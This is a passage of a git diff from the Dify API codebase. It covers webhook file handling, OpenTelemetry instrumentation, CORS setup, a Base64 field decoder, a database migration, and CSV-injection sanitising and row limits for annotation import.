PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py new file mode 100644 index 0000000000..0eb43d66f4 --- /dev/null +++ b/api/extensions/ext_session_factory.py @@ -0,0 +1,7 @@ +from core.db.session_factory import configure_session_factory +from extensions.ext_database import db + + +def init_app(app): + with app.app_context(): + configure_session_factory(db.engine) diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. + + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/libs/helper.py b/api/libs/helper.py index abc81d1fde..4a7afe0bda 100644 --- a/api/libs/helper.py +++ b/api/libs/helper.py @@ -184,7 +184,7 @@ def timezone(timezone_string): def convert_datetime_to_date(field, target_timezone: str = ":tz"): if dify_config.DB_TYPE == "postgresql": return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))" - elif dify_config.DB_TYPE == "mysql": + elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]: return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))" else: raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}") diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce +Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index ba2eaf6749..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -1532,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( diff --git a/api/pyproject.toml b/api/pyproject.toml index 092b5ab9f9..4fbd7433d1 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -216,6 +216,7 @@ vdb = [ "pymochow==2.2.9", "pyobvector~=0.2.17", "qdrant-client==1.9.0", + "intersystems-irispython>=5.1.0", "tablestore==6.3.7", "tcvectordb~=1.6.4", "tidb-vector==0.0.9", diff --git a/api/pytest.ini b/api/pytest.ini index afb53b47cc..4a9470fa0c 100644 --- a/api/pytest.ini +++ b/api/pytest.ini @@ -1,5 +1,5 @@ [pytest] -addopts = --cov=./api --cov-report=json --cov-report=xml +addopts = --cov=./api --cov-report=json env = ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,10 +1,14 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -155,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -171,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod @@ -330,6 +350,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." + ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +455,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 8097a6daa0..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -1419,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) @@ -2817,20 +2817,20 @@ class SegmentService: db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py index 6eb8d0031d..0f969207cf 100644 --- a/api/services/variable_truncator.py +++ b/api/services/variable_truncator.py @@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator): @overload def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ... + @overload + def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ... + def _truncate_json_primitives( self, - val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None, + val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None, target_size: int, ) -> _PartResult[Any]: """Truncate a value within an object to fit within budget.""" @@ -425,6 +428,9 @@ class VariableTruncator(BaseTruncator): return self._truncate_array(val, target_size) elif isinstance(val, dict): return self._truncate_object(val, target_size) + elif isinstance(val, File): + # File objects should not be truncated, return as-is + return _PartResult(val, self.calculate_json_size(val), False) elif val is None or isinstance(val, (bool, int, float)): return _PartResult(val, self.calculate_json_size(val), False) else: diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py index 8e46e8d0e3..775814318b 100644 --- a/api/tasks/annotation/batch_import_annotations_task.py +++ b/api/tasks/annotation/batch_import_annotations_task.py @@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green")) start_at = time.perf_counter() indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" + active_jobs_key = f"annotation_import_active:{tenant_id}" + # get app info app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first() @@ -91,4 +93,13 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id: redis_client.setex(indexing_error_msg_key, 600, str(e)) logger.exception("Build index for batch import annotations failed") finally: + # Clean up active job tracking to release concurrency slot + try: + redis_client.zrem(active_jobs_key, job_id) + logger.debug("Released concurrency slot for job: %s", job_id) + except Exception as cleanup_error: + # Log but don't fail if cleanup fails - the job will be auto-expired + logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error) + + # Close database session db.session.close() diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py index 8608df6b8e..b4d82a150d 100644 --- a/api/tasks/clean_dataset_task.py +++ b/api/tasks/clean_dataset_task.py @@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory 